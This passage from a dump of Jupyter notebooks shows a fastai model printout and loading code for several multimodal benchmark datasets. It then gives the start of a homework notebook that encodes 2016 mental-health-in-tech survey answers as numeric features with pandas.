1), bias=False)\n (bn1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (6): Sequential(\n (0): BasicBlock(\n (conv1): Conv2d(128, 256, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (downsample): Sequential(\n (0): Conv2d(128, 256, kernel_size=(1, 1), stride=(2, 2), bias=False)\n (1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (1): BasicBlock(\n (conv1): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (2): BasicBlock(\n (conv1): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (3): BasicBlock(\n (conv1): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): 
ReLU(inplace=True)\n (conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (4): BasicBlock(\n (conv1): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (5): BasicBlock(\n (conv1): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (7): Sequential(\n (0): BasicBlock(\n (conv1): Conv2d(256, 512, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (downsample): Sequential(\n (0): Conv2d(256, 512, kernel_size=(1, 1), stride=(2, 2), bias=False)\n (1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (1): BasicBlock(\n (conv1): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): 
BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (2): BasicBlock(\n (conv1): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n )\n (1): Sequential(\n (0): AdaptiveConcatPool2d(\n (ap): AdaptiveAvgPool2d(output_size=1)\n (mp): AdaptiveMaxPool2d(output_size=1)\n )\n (1): Flatten(full=False)\n (2): BatchNorm1d(1024, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (3): Dropout(p=0.25, inplace=False)\n (4): Linear(in_features=1024, out_features=512, bias=False)\n (5): ReLU(inplace=True)\n (6): BatchNorm1d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (7): Dropout(p=0.5, inplace=False)\n (8): Linear(in_features=512, out_features=2, bias=False)\n )\n)\n" ], [ "sf = SaveFeatures(img_clf.model[1][4])", "_____no_output_____" ], [ "# access dls from the trained classifier\ntest_df = df.sample(10)\nprint(test_df)\ntest_dl = img_clf.dls.test_dl(test_df, with_labels=True)\ntest_dl", " name label\n206 train/3/9959.png 3\n974 valid/3/9177.png 3\n46 train/3/9293.png 3\n1215 valid/7/8316.png 7\n635 train/7/9571.png 7\n908 valid/3/7312.png 3\n746 valid/3/7140.png 3\n1031 valid/3/8254.png 3\n951 valid/3/9283.png 3\n952 valid/3/8354.png 3\n" ], [ "# run img_clf through test data\n\npreds, _ = img_clf.get_preds(dl=test_dl)", "_____no_output_____" ], [ "# get embeddings of training data\nsf.features.shape", "_____no_output_____" ] ], [ [ "# 0) create datasets", "_____no_output_____" ] ], [ [ "from pathlib import Path\nnrows = 10**20\ndata_path='/content/drive/MyDrive/fastai_multimodal/datasets/'", "_____no_output_____" ] ], [ [ "## dataset0 (cnt, cat)\n\nThis example uses 
the\n[United States Census Income Dataset](https://archive.ics.uci.edu/ml/datasets/Census-Income+%28KDD%29)\nprovided by the\n[UC Irvine Machine Learning Repository](https://archive.ics.uci.edu/ml/index.php).\nThe task is binary classification to determine whether a person makes over 50K a year.\n\nThe dataset includes ~300K instances with 41 input features: 7 numerical features\nand 34 categorical features.", "_____no_output_____" ] ], [ [ "# Column names.\nCSV_HEADER = [\n \"age\",\n \"class_of_worker\",\n \"detailed_industry_recode\",\n \"detailed_occupation_recode\",\n \"education\",\n \"wage_per_hour\",\n \"enroll_in_edu_inst_last_wk\",\n \"marital_stat\",\n \"major_industry_code\",\n \"major_occupation_code\",\n \"race\",\n \"hispanic_origin\",\n \"sex\",\n \"member_of_a_labor_union\",\n \"reason_for_unemployment\",\n \"full_or_part_time_employment_stat\",\n \"capital_gains\",\n \"capital_losses\",\n \"dividends_from_stocks\",\n \"tax_filer_stat\",\n \"region_of_previous_residence\",\n \"state_of_previous_residence\",\n \"detailed_household_and_family_stat\",\n \"detailed_household_summary_in_household\",\n \"instance_weight\",\n \"migration_code-change_in_msa\",\n \"migration_code-change_in_reg\",\n \"migration_code-move_within_reg\",\n \"live_in_this_house_1_year_ago\",\n \"migration_prev_res_in_sunbelt\",\n \"num_persons_worked_for_employer\",\n \"family_members_under_18\",\n \"country_of_birth_father\",\n \"country_of_birth_mother\",\n \"country_of_birth_self\",\n \"citizenship\",\n \"own_business_or_self_employed\",\n \"fill_inc_questionnaire_for_veteran's_admin\",\n \"veterans_benefits\",\n \"weeks_worked_in_year\",\n \"year\",\n \"income_level\",\n]\n\ndf_url = \"https://archive.ics.uci.edu/ml/machine-learning-databases/census-income-mld/census-income.data.gz\"\ndf = pd.read_csv(df_url, header=None, names=CSV_HEADER, nrows=nrows)#[['age','capital_losses', 'citizenship', 'income_level', \"instance_weight\"]] #tmp: subset cols\n\n\ntest_df_url = 
\"https://archive.ics.uci.edu/ml/machine-learning-databases/census-income-mld/census-income.test.gz\"\ntest_df = pd.read_csv(test_df_url, header=None, names=CSV_HEADER, nrows=nrows)#[['age', 'capital_losses', 'citizenship', 'income_level', \"instance_weight\"]]\n\nprint(f\"Data shape: {df.shape}\")\nprint(f\"Test data shape: {test_df.shape}\")\n\n\n\nlabel_col = \"income_level\"\nweight = \"instance_weight\"\ndf[label_col] = df[label_col].apply(\n lambda x: 0 if x == \" - 50000.\" else 1\n)\ntest_df[label_col] = test_df[label_col].apply(\n lambda x: 0 if x == \" - 50000.\" else 1\n)\n\n#save a copy\ndf.to_csv(data_path+'df_income.csv')\ntest_df.to_csv(data_path+'test_df_income.csv')\n\n#dbck\ndf.tail()\n\n\n", "Data shape: (199523, 42)\nTest data shape: (99762, 42)\n" ], [ "!pwd", "/content/drive/MyDrive/multimodal_text_benchmark\n" ] ], [ [ "## dataset1 (txt+img)\n\nRef: https://keras.io/examples/nlp/multimodal_entailment/", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport os\nimport tensorflow as tf\nimage_base_path = tf.keras.utils.get_file(\n \"tweet_images\",\n \"https://github.com/sayakpaul/Multimodal-Entailment-Baseline/releases/download/v1.0.0/tweet_images.tar.gz\",\n untar=True,\n)\n\ndf = pd.read_csv(\"https://github.com/sayakpaul/Multimodal-Entailment-Baseline/raw/main/csvs/tweets.csv\", nrows=nrows)\n\nimages_one_paths = []\nimages_two_paths = []\n\nfor idx in range(len(df)):\n current_row = df.iloc[idx]\n id_1 = current_row[\"id_1\"]\n id_2 = current_row[\"id_2\"]\n extentsion_one = current_row[\"image_1\"].split(\".\")[-1]\n extentsion_two = current_row[\"image_2\"].split(\".\")[-1]\n\n image_one_path = os.path.join(image_base_path, str(id_1) + f\".{extentsion_one}\")\n image_two_path = os.path.join(image_base_path, str(id_2) + f\".{extentsion_two}\")\n\n images_one_paths.append(image_one_path)\n images_two_paths.append(image_two_path)\nprint(df.columns)\ndf[\"image_1_path\"] = images_one_paths\ndf[\"image_2_path\"] = 
images_two_paths\n\ndf.drop(['image_1', 'image_2', 'id_1', 'id_2'], axis=1, inplace=True)\nlabel_col = 'label'\nweight = None\nnum_classes = len(df[label_col].value_counts())\nimg_path = '/root/.keras/datasets/tweet_images'\nimg_cols = [\"image_1_path\", \"image_2_path\"]\n\n\n#save a copy\ndf.to_csv(data_path+'df_entailment.csv')\n\n#dbck\ndf.tail()", "Index(['id_1', 'text_1', 'image_1', 'id_2', 'text_2', 'image_2', 'label'], dtype='object')\n" ] ], [ [ "## dataset2 (cnt, cat, txt)\n\nThe original task in Kaggle's <a href=\"https://www.kaggle.com/c/petfinder-adoption-prediction\" class=\"external\">PetFinder.my Adoption Prediction competition</a> was to predict the speed at which a pet will be adopted (e.g. in the first week, the first month, the first three months, and so on).", "_____no_output_____" ] ], [ [ "dataset_url = 'http://storage.googleapis.com/download.tensorflow.org/data/petfinder-mini.zip'\ncsv_file = 'datasets/petfinder-mini/petfinder-mini.csv'\n\ntf.keras.utils.get_file('petfinder_mini.zip', dataset_url,\n extract=True, cache_dir='.')\ndf = pd.read_csv(csv_file, nrows=nrows)\n\nlabel_col = 'AdoptionSpeed'\n\n#save a copy\ndf.to_csv(data_path+'df_adoption.csv')\n\n#dbck\ndf.tail()", "Downloading data from http://storage.googleapis.com/download.tensorflow.org/data/petfinder-mini.zip\n1671168/1668792 [==============================] - 0s 0us/step\n1679360/1668792 [==============================] - 0s 0us/step\n" ] ], [ [ "## dataset3 (tab+txt)\n\nRef: https://github.com/sxjscience/automl_multimodal_benchmark", "_____no_output_____" ] ], [ [ "from pathlib import Path\nimport os\ndata_path = Path('../multimodal_text_benchmark/') #/drive/My Drive\nos.chdir(data_path)\n\n#dbck\n!pwd", "/content/drive/MyDrive/multimodal_text_benchmark\n" ], [ "# Install the benchmarking suite\n!pip install -U -e .", "Obtaining file:///content/drive/MyDrive/multimodal_text_benchmark\nRequirement already satisfied: absl-py in /usr/local/lib/python3.7/dist-packages (from 
auto-mm-bench==1.0.0.dev20220329) (1.0.0)\nCollecting boto3\n Downloading boto3-1.21.28-py3-none-any.whl (132 kB)\n\u001b[K |████████████████████████████████| 132 kB 16.5 MB/s \n\u001b[?25hCollecting javalang>=0.13.0\n Downloading javalang-0.13.0-py3-none-any.whl (22 kB)\nRequirement already satisfied: h5py>=2.10.0 in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (3.1.0)\nCollecting yacs>=0.1.8\n Downloading yacs-0.1.8-py3-none-any.whl (14 kB)\nRequirement already satisfied: protobuf in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (3.17.3)\nCollecting unidiff\n Downloading unidiff-0.7.3-py2.py3-none-any.whl (14 kB)\nCollecting sentencepiece\n Downloading sentencepiece-0.1.96-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (1.2 MB)\n\u001b[K |████████████████████████████████| 1.2 MB 59.2 MB/s \n\u001b[?25hRequirement already satisfied: tqdm in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (4.63.0)\nRequirement already satisfied: xarray in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (0.18.2)\nRequirement already satisfied: regex in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (2019.12.20)\nRequirement already satisfied: requests in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (2.23.0)\nCollecting jsonlines\n Downloading jsonlines-3.0.0-py3-none-any.whl (8.5 kB)\nCollecting contextvars\n Downloading contextvars-2.4.tar.gz (9.6 kB)\nRequirement already satisfied: pyarrow in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (6.0.1)\nRequirement already satisfied: pandas in /usr/local/lib/python3.7/dist-packages (from auto-mm-bench==1.0.0.dev20220329) (1.3.5)\nCollecting py-cpuinfo\n Downloading py-cpuinfo-8.0.0.tar.gz (99 kB)\n\u001b[K |████████████████████████████████| 99 kB 11.6 MB/s \n\u001b[?25hCollecting 
fasttext!=0.9.2,>=0.9.1\n Downloading fasttext-0.9.1.tar.gz (57 kB)\n\u001b[K |████████████████████████████████| 57 kB 6.2 MB/s \n\u001b[?25hCollecting pybind11>=2.2\n Using cached pybind11-2.9.1-py2.py3-none-any.whl (211 kB)\nRequirement already satisfied: setuptools>=0.7.0 in /usr/local/lib/python3.7/dist-packages (from fasttext!=0.9.2,>=0.9.1->auto-mm-bench==1.0.0.dev20220329) (57.4.0)\nRequirement already satisfied: numpy in /usr/local/lib/python3.7/dist-packages (from fasttext!=0.9.2,>=0.9.1->auto-mm-bench==1.0.0.dev20220329) (1.21.5)\nRequirement already satisfied: cached-property in /usr/local/lib/python3.7/dist-packages (from h5py>=2.10.0->auto-mm-bench==1.0.0.dev20220329) (1.5.2)\nRequirement already satisfied: six in /usr/local/lib/python3.7/dist-packages (from javalang>=0.13.0->auto-mm-bench==1.0.0.dev20220329) (1.15.0)\nRequirement already satisfied: PyYAML in /usr/local/lib/python3.7/dist-packages (from yacs>=0.1.8->auto-mm-bench==1.0.0.dev20220329) (3.13)\nCollecting s3transfer<0.6.0,>=0.5.0\n Downloading s3transfer-0.5.2-py3-none-any.whl (79 kB)\n\u001b[K |████████████████████████████████| 79 kB 9.3 MB/s \n\u001b[?25hCollecting jmespath<2.0.0,>=0.7.1\n Downloading jmespath-1.0.0-py3-none-any.whl (23 kB)\nCollecting botocore<1.25.0,>=1.24.28\n Downloading botocore-1.24.28-py3-none-any.whl (8.6 MB)\n\u001b[K |████████████████████████████████| 8.6 MB 65.3 MB/s \n\u001b[?25hCollecting urllib3<1.27,>=1.25.4\n Downloading urllib3-1.26.9-py2.py3-none-any.whl (138 kB)\n\u001b[K |████████████████████████████████| 138 kB 74.9 MB/s \n\u001b[?25hRequirement already satisfied: python-dateutil<3.0.0,>=2.1 in /usr/local/lib/python3.7/dist-packages (from botocore<1.25.0,>=1.24.28->boto3->auto-mm-bench==1.0.0.dev20220329) (2.8.2)\nCollecting immutables>=0.9\n Downloading immutables-0.17-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl (116 kB)\n\u001b[K |████████████████████████████████| 116 kB 68.4 MB/s 
\n\u001b[?25hRequirement already satisfied: typing-extensions>=3.7.4.3 in /usr/local/lib/python3.7/dist-packages (from immutables>=0.9->contextvars->auto-mm-bench==1.0.0.dev20220329) (3.10.0.2)\nRequirement already satisfied: attrs>=19.2.0 in /usr/local/lib/python3.7/dist-packages (from jsonlines->auto-mm-bench==1.0.0.dev20220329) (21.4.0)\nRequirement already satisfied: pytz>=2017.3 in /usr/local/lib/python3.7/dist-packages (from pandas->auto-mm-bench==1.0.0.dev20220329) (2018.9)\nRequirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests->auto-mm-bench==1.0.0.dev20220329) (3.0.4)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests->auto-mm-bench==1.0.0.dev20220329) (2.10)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests->auto-mm-bench==1.0.0.dev20220329) (2021.10.8)\nCollecting urllib3<1.27,>=1.25.4\n Downloading urllib3-1.25.11-py2.py3-none-any.whl (127 kB)\n\u001b[K |████████████████████████████████| 127 kB 77.8 MB/s \n\u001b[?25hBuilding wheels for collected packages: fasttext, contextvars, py-cpuinfo\n Building wheel for fasttext (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for fasttext: filename=fasttext-0.9.1-cp37-cp37m-linux_x86_64.whl size=2497842 sha256=e1bcc3031860c8602d683f0d7e0860e57de703194ac43c2fb98306eb3ba414dc\n Stored in directory: /root/.cache/pip/wheels/b2/5b/4b/9c582c778bb93aaad8fc855d5e79f49eae34f59e363a22c422\n Building wheel for contextvars (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for contextvars: filename=contextvars-2.4-py3-none-any.whl size=7681 sha256=efc84482115aab5616c1b05f410b427dd8263a84f4f3565bd497c17323e4ff1c\n Stored in directory: /root/.cache/pip/wheels/0a/11/79/e70e668095c0bb1f94718af672ef2d35ee7a023fee56ef54d9\n Building wheel for py-cpuinfo (setup.py) ... 
\u001b[?25l\u001b[?25hdone\n Created wheel for py-cpuinfo: filename=py_cpuinfo-8.0.0-py3-none-any.whl size=22257 sha256=437c7b02bc61ce35f6ce8b824ed8e32a5542d970b791ec34c94c563952c17934\n Stored in directory: /root/.cache/pip/wheels/d2/f1/1f/041add21dc9c4220157f1bd2bd6afe1f1a49524c3396b94401\nSuccessfully built fasttext contextvars py-cpuinfo\nInstalling collected packages: urllib3, jmespath, botocore, s3transfer, pybind11, immutables, yacs, unidiff, sentencepiece, py-cpuinfo, jsonlines, javalang, fasttext, contextvars, boto3, auto-mm-bench\n Attempting uninstall: urllib3\n Found existing installation: urllib3 1.24.3\n Uninstalling urllib3-1.24.3:\n Successfully uninstalled urllib3-1.24.3\n Running setup.py develop for auto-mm-bench\n\u001b[31mERROR: pip's dependency resolver does not currently take into account all the packages that are installed. This behaviour is the source of the following dependency conflicts.\ndatascience 0.10.6 requires folium==0.2.1, but you have folium 0.8.3 which is incompatible.\u001b[0m\nSuccessfully installed auto-mm-bench-1.0.0.dev20220329 boto3-1.21.28 botocore-1.24.28 contextvars-2.4 fasttext-0.9.1 immutables-0.17 javalang-0.13.0 jmespath-1.0.0 jsonlines-3.0.0 py-cpuinfo-8.0.0 pybind11-2.9.1 s3transfer-0.5.2 sentencepiece-0.1.96 unidiff-0.7.3 urllib3-1.25.11 yacs-0.1.8\n" ], [ "# view all available datasets\nfrom auto_mm_bench.datasets import create_dataset, TEXT_BENCHMARK_ALIAS_MAPPING\ndatasets = list(TEXT_BENCHMARK_ALIAS_MAPPING.values())\nprint(f'-----all available datasets = {datasets}')\n\n# select a dataset\ndataset_name = datasets[-2]\nprint(f'=====selected dataset_name={dataset_name}')\nfrom auto_mm_bench.datasets import dataset_registry\ntrain_dataset = dataset_registry.create(dataset_name, 'train')\ntest_dataset = dataset_registry.create(dataset_name, 'test')", "-----all available datasets = ['product_sentiment_machine_hack', 'melbourne_airbnb', 'news_channel', 'wine_reviews', 'imdb_genre_prediction', 
'jigsaw_unintended_bias100K', 'fake_job_postings2', 'kick_starter_funding', 'ae_price_prediction', 'google_qa_answer_type_reason_explanation', 'google_qa_question_type_reason_explanation', 'women_clothing_review', 'mercari_price_suggestion100K', 'jc_penney_products', 'news_popularity2', 'bookprice_prediction', 'data_scientist_salary', 'california_house_price']\n=====selected dataset_name=data_scientist_salary\n" ], [ "df = train_dataset.data.head(nrows)\ndf_test = test_dataset.data.head(nrows)\ndf.tail()", "_____no_output_____" ], [ "#define global variables: df, x_cols, label_col, num_classes\nx_cols = train_dataset.feature_columns\nlabel_col = train_dataset.label_columns[0]\nx_cols, label_col", "_____no_output_____" ], [ "\n#save a copy\ndf.to_csv(data_path+'df_salary.csv')\ntest_df.to_csv(data_path+'test_df_salary.csv')", "_____no_output_____" ] ], [ [ "## dataset4 (tab, txt) skippable meeting", "_____no_output_____" ] ], [ [ "df = pd.read_csv(data_path+'iu_2022_101_325.csv', index_col=0)\nlabel_col = 'response_status'\ndf.tail()\n", "_____no_output_____" ], [ "list(df.columns)", "_____no_output_____" ], [ "", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ] ]
e72f32e173bcaed803bf6db09e3b2a525f97b461
23,929
ipynb
Jupyter Notebook
notebook/HW4.ipynb
GWU-CS2021/CSCI6364
ea25867ceb39e309ce1acca37618aebc54f822ae
[ "MIT" ]
null
null
null
notebook/HW4.ipynb
GWU-CS2021/CSCI6364
ea25867ceb39e309ce1acca37618aebc54f822ae
[ "MIT" ]
null
null
null
notebook/HW4.ipynb
GWU-CS2021/CSCI6364
ea25867ceb39e309ce1acca37618aebc54f822ae
[ "MIT" ]
null
null
null
38.78282
351
0.429813
[ [ [ "import pandas\n\ndataframe = pandas.read_csv('mental-heath-in-tech-2016_20161114.csv')\n\n#firstly fill all missing with -1, and treat these fields in the later part if needed\ndataframe = dataframe.fillna(-1)\n\ncolumn_keep = [\"Is your employer primarily a tech company/organization?\",\"What is your age?\",\"Have you ever sought treatment for a mental health issue from a mental health professional?\",\"Have you been diagnosed with a mental health condition by a medical professional?\",\"Do you have previous employers?\",\"Are you self-employed?\"]\nclean_DF = dataframe[column_keep].copy()\nclean_DF.rename(columns = {'What is your age?':'age',\n 'Have you ever sought treatment for a mental health issue from a mental health professional?':'sought',\n 'Have you been diagnosed with a mental health condition by a medical professional?':'diagnosed',\n 'Do you have previous employers?':'previous-employer',\n 'Are you self-employed?':'self-employeed',\n 'Is your employer primarily a tech company/organization?':'tech-company'}, inplace = True)\nclean_DF['diagnosed'] = clean_DF['diagnosed'].map({'Yes':1,'No':0})\nclean_DF['tech-company'] = clean_DF['tech-company'].map({1:1}).fillna(0)\nclean_DF['have-disorder'] = dataframe['Do you currently have a mental health disorder?'].map({\"Yes\":2,\"No\":0,\"Maybe\":1}).fillna(0)\nclean_DF['have-disorder-past'] = dataframe['Have you had a mental health disorder in the past?'].map({\"Yes\":2,\"No\":0,\"Maybe\":1}).fillna(0)\nclean_DF['remote']=dataframe['Do you work remotely?'].map({'Always':2,'Sometimes':1,'Never':0})\nclean_DF['gender']=dataframe['What is your gender?'].str.lower().map({\"male\":1,\"m\":1,\"f\":2,\"female\":2}).fillna(0)\nclean_DF['company-scale'] = dataframe['How many employees does your company or organization have?'].map({\"1-5\":1,\"6-25\":2,\"26-100\":3,\"100-500\":4,\"500-1000\":5,\"More than 1000\":6}).fillna(0)\nclean_DF['is_anxiety_disorder'] = dataframe['If yes, what condition(s) have you been 
diagnosed with?'].str.contains('Anxiety', regex=False).map({True:1}).fillna(0)\nclean_DF['is_mood_disorder'] = dataframe['If yes, what condition(s) have you been diagnosed with?'].str.contains('Mood', regex=False).map({True:1}).fillna(0)\n\n\n# merge attitude toward mental illness( these two will be the same progress as merge to mental health)\nclean_DF['attitude']=dataframe['Would you bring up a mental health issue with a potential employer in an interview?'].map({\"Yes\":2,\"No\":0,\"Maybe\":1}).fillna(0) + \\\ndataframe['Do you feel that being identified as a person with a mental health issue would hurt your career?'].map({\"No, I don't think it would\":2,\"Yes, I think it would\":0,\"Maybe\":1}).fillna(0) + \\\ndataframe['Do you think that team members/co-workers would view you more negatively if they knew you suffered from a mental health issue?'].map({\"No, they do not\":2,\"Yes, I think they would\":0,\"Maybe\":1}).fillna(0) + \\\ndataframe['How willing would you be to share with friends and family that you have a mental illness?'].map({\"Yes\":2,\"No\":0,\"Maybe\":1}).fillna(0) + \\\ndataframe['Have you observed or experienced an unsupportive or badly handled response to a mental health issue in your current or previous workplace?'].str.contains('Yes', regex=False).map({True:1}).fillna(0) + \\\ndataframe['Have your observations of how another individual who discussed a mental health disorder made you less likely to reveal a mental health issue yourself in your current workplace?'].str.contains('Yes', regex=False).map({True:1}).fillna(0)\n# merge previous access to mental health( these two will be the same progress as merge to mental health)\nclean_DF['previous_access']= dataframe['Was your anonymity protected if you chose to take advantage of mental health or substance abuse treatment resources with previous employers?'].str.contains('Yes', regex=False).map({True:1}).fillna(0)\n\n# merge access to mental health\nclean_DF['access']= dataframe['Does your 
employer provide mental health benefits as part of healthcare coverage?'].map({\"Yes\":1}).fillna(0) + \\\ndataframe['Do you know the options for mental health care available under your employer-provided coverage?'].map({\"Yes\":1}).fillna(0) + \\\ndataframe['Has your employer ever formally discussed mental health (for example, as part of a wellness campaign or other official communication)?'].map({\"Yes\":1}).fillna(0) + \\\ndataframe['Does your employer offer resources to learn more about mental health concerns and options for seeking help?'].map({\"Yes\":1}).fillna(0) + \\\ndataframe['Is your anonymity protected if you choose to take advantage of mental health or substance abuse treatment resources provided by your employer?'].map({\"Yes\":1}).fillna(0) + \\\ndataframe['If a mental health issue prompted you to request a medical leave from work, asking for that leave would be:'].map({\"Very easy\":5,\"Somewhat easy\":4,\"Neither easy nor difficult\":3,\"Somewhat difficult\":2,\"Very difficult\":1}).fillna(1) + \\\ndataframe['Do you think that discussing a mental health disorder with your employer would have negative consequences?'].map({\"Yes\":0}).fillna(1) + \\\ndataframe['Do you think that discussing a physical health issue with your employer would have negative consequences?'].map({\"Yes\":0}).fillna(1) + \\\ndataframe['Would you feel comfortable discussing a mental health disorder with your coworkers?'].map({\"Yes\":1}).fillna(0) + \\\ndataframe['Would you feel comfortable discussing a mental health disorder with your direct supervisor(s)?'].map({\"Yes\":1}).fillna(0) + \\\ndataframe['Do you feel that your employer takes mental health as seriously as physical health?'].map({\"Yes\":1}).fillna(0) + \\\ndataframe['Have you heard of or observed negative consequences for co-workers who have been open about mental health issues in your workplace?'].map({\"Yes\":0}).fillna(1)\n\nclean_DF\n\n\n", "_____no_output_____" ], [ "from sklearn.model_selection import 
